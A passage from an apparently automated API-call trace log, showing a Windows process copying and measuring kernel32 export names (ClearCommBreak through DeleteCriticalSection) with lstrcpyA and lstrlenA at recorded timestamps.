lpString1="ClearCommBreak") returned="ClearCommBreak" [0092.942] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0092.942] lstrcpyA (in: lpString1=0x355e7c0, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0092.942] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0092.942] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0092.942] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0092.942] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0092.942] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0092.942] lstrcpyA (in: lpString1=0x355e7c0, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0092.942] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0092.942] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0092.942] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0092.942] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0092.942] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0092.942] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0092.942] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0092.942] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0092.942] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0092.942] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0092.942] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0092.942] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0092.942] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0092.942] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0092.942] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0092.942] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0092.942] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0092.942] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0092.942] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0092.942] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0092.942] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0092.942] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0092.942] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0092.942] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0092.942] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0092.943] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0092.943] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0092.943] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0092.943] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0092.943] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0092.943] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0092.943] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0092.943] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0092.943] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0092.943] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0092.943] lstrcpyA (in: lpString1=0x355e7c0, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0092.943] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0092.943] lstrcpyA (in: lpString1=0x355e7c0, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0092.943] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0092.943] lstrcpyA (in: lpString1=0x355e7c0, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0092.943] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0092.943] lstrcpyA (in: lpString1=0x355e7c0, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0092.943] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0092.943] lstrcpyA (in: lpString1=0x355e7c0, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0092.943] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0092.943] lstrcpyA (in: lpString1=0x355e7c0, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0092.943] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0092.943] lstrcpyA (in: lpString1=0x355e7c0, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0092.943] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0092.943] lstrcpyA (in: lpString1=0x355e7c0, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0092.943] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0092.943] lstrcpyA (in: lpString1=0x355e7c0, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0092.943] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0092.943] lstrcpyA (in: lpString1=0x355e7c0, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0092.943] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0092.943] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0092.943] lstrlenA (lpString="COPYCONTEXT") returned 11 [0092.943] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0092.943] lstrlenA (lpString="COPYFILEA") returned 9 [0092.944] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0092.944] lstrlenA (lpString="COPYFILEEXA") returned 11 [0092.944] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0092.944] lstrlenA (lpString="COPYFILEEXW") returned 11 [0092.944] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0092.944] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0092.944] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0092.944] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0092.944] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0092.944] lstrlenA (lpString="COPYFILEW") returned 9 [0092.944] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0092.944] lstrlenA (lpString="COPYLZFILE") returned 10 [0092.944] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0092.944] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0092.944] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0092.944] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0092.944] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0092.944] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0092.944] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0092.944] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0092.944] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0092.944] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0092.944] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0092.944] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0092.944] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0092.944] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0092.944] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0092.944] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0092.944] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0092.944] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0092.944] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0092.944] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0092.944] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0092.945] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0092.945] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0092.945] lstrlenA (lpString="CREATEEVENTA") returned 12 [0092.945] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0092.945] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0092.945] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0092.945] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0092.945] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0092.945] lstrlenA (lpString="CREATEEVENTW") returned 12 [0092.945] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0092.945] lstrlenA (lpString="CREATEFIBER") returned 11 [0092.945] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0092.945] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0092.945] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0092.945] lstrlenA (lpString="CREATEFILEA") returned 11 [0092.945] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0092.945] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0092.945] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0092.945] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0092.945] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0092.945] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0092.945] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0092.945] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0092.945] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0092.945] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0092.945] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0092.945] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0092.945] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0092.945] lstrlenA (lpString="CREATEFILEW") returned 11 [0092.945] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0092.945] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0092.945] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0092.945] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0092.945] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0092.946] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0092.946] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0092.946] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0092.946] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0092.946] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0092.946] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0092.946] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0092.946] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0092.946] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0092.946] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0092.946] lstrlenA (lpString="CREATEJOBSET") returned 12 [0092.946] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0092.946] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0092.946] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0092.946] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0092.946] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0092.946] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0092.946] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0092.946] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0092.946] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0092.946] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0092.946] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0092.946] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0092.946] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0092.946] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0092.946] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0092.946] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0092.946] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0092.946] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0092.946] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0092.946] lstrlenA (lpString="CREATEPIPE") returned 10 [0092.946] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0092.946] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0092.946] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0092.947] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0092.947] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0092.947] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0092.947] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0092.947] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0092.947] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0092.947] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0092.947] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0092.947] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0092.947] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0092.947] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0092.947] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0092.947] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0092.947] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0092.947] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0092.947] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0092.947] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0092.947] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0092.947] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0092.947] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0092.947] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0092.947] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0092.947] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0092.947] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0092.947] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0092.947] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0092.947] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0092.947] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0092.947] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0092.947] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0092.947] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0092.947] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0092.947] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0092.947] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0092.948] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0092.948] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0092.948] lstrlenA (lpString="CREATETHREAD") returned 12 [0092.948] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0092.948] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0092.948] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0092.948] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0092.948] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0092.948] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0092.948] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0092.948] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0092.948] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0092.948] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0092.948] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0092.948] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0092.948] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0092.948] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0092.948] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0092.948] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0092.948] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0092.948] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0092.948] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0092.948] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0092.948] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0092.948] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0092.948] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0092.948] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0092.948] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0092.948] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0092.948] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0092.948] lstrlenA (lpString="CTRLROUTINE") returned 11 [0092.948] lstrcpyA (in: lpString1=0x355e7c0, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0092.948] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0092.948] lstrcpyA (in: lpString1=0x355e7c0, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0092.949] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0092.949] lstrcpyA (in: lpString1=0x355e7c0, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0092.949] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0092.949] lstrcpyA (in: lpString1=0x355e7c0, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0092.949] lstrlenA (lpString="DEBUGBREAK") returned 10 [0092.949] lstrcpyA (in: lpString1=0x355e7c0, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0092.949] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0092.949] lstrcpyA (in: lpString1=0x355e7c0, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0092.949] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0092.949] lstrcpyA (in: lpString1=0x355e7c0, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0092.949] lstrlenA (lpString="DECODEPOINTER") returned 13 [0092.949] lstrcpyA (in: lpString1=0x355e7c0, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0092.949] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0092.949] lstrcpyA (in: lpString1=0x355e7c0, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0092.949] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0092.949] lstrcpyA (in: lpString1=0x355e7c0, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0092.949] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0092.949] lstrcpyA (in: lpString1=0x355e7c0, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0092.949] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0092.949] lstrcpyA (in: lpString1=0x355e7c0, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0092.949] lstrlenA (lpString="DELETEATOM") returned 10 [0092.949] lstrcpyA (in: lpString1=0x355e7c0, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0092.949] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0092.949] lstrcpyA (in: lpString1=0x355e7c0, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0092.949] lstrlenA 